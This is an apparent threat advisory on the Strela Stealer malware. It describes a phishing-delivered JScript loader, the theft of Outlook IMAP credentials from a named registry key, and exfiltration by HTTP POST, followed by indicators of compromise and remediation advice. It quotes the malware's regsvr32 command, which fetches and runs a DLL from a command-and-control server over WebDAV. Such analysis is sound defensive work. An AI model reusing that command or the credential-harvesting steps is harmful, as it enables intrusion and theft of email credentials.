Strela Stealer employs multi-stage infection and obfuscation techniques to evade detection. The initial infection starts with a heavily obfuscated JScript file, which verifies the target system’s geographic location by checking the system’s locale identifier (LCID) in the Windows registry (Control Panel\International\Locale). Once confirmed as a target, the script downloads additional payloads from a command-and-control (C2) server using the WebDAV protocol. The malware loads its second stage directly into memory via the command:

"cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL"

This fileless execution method prevents detection by traditional antivirus solutions.

The final payload focuses on stealing Microsoft Outlook credentials. It scans the Windows registry for Outlook profile data, particularly targeting the key:

"HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"

where email configurations are stored. The malware extracts IMAP Usernames, Servers, and Passwords, decrypting stored credentials using the CryptUnprotectData API. Before exfiltrating stolen data, it employs bit-checking routines to ensure activation only on targeted systems. The stolen credentials and system information are then transmitted via HTTP POST requests to an attacker-controlled server.

Strela Stealer highlights the growing sophistication of targeted phishing attacks and fileless malware techniques. Organizations must strengthen email security, implement geo-based filtering, disable macros in email attachments, and monitor WebDAV traffic to detect abnormal connections. Additionally, using multi-factor authentication (MFA) and endpoint detection solutions can significantly reduce the risk of credential theft.

Impact

• Credential Theft
• Data Theft
• Command Execution

Indicators of Compromise

IP

• 193.143.1.205

MD5

• 5ffaa31b6bdb230103cad1d3a7e88982

• a1da7ee6e62dd8a6226a13e22ee63f51

• 003c31acbc417d777232960a502158c8

SHA-256

• f5c54fce6c9e2f84b084bbf9968c9a76d9cd74a11ccf4fcba29dbe2e4574e3d7

• 9c49266e315eb76ce73cbe542cfd2bbf28844689944ac8776daecbdcdecd8cf8

• 31389cb2f067020f181462bab3519c22fd88da084012729e9edf79d15427b86f

SHA1

• 4d2def6ee868c20a4aa74b658dae9794c1724a69

• 4005b309336cda3a4f0c72655163176a23cdf8fd

• b222e9a5361ce4aab6ac55272cb485feafe8e79c

URL

• http://193.143.1.205/invoice.php
• http://193.143.1.205/up.php

Remediation

• Implement geo-based email filtering to block phishing emails targeting specific regions.
• Train employees to recognize phishing attempts, especially invoice-related email scams.
• Enforce multi-factor authentication (MFA) to prevent unauthorized email access.
• Regularly update endpoint detection and response (EDR) solutions to detect fileless malware.
• Disable macros and script execution for untrusted email attachments.
• Monitor WebDAV traffic for unusual outbound connections to potential command-and-control servers.
• Restrict execution of JScript and other scripting languages in corporate environments.
• Conduct regular security audits to identify and patch vulnerabilities in email clients.
• Use application whitelisting to prevent unauthorized script execution.
• Deploy email security gateways to scan and filter malicious attachments before delivery.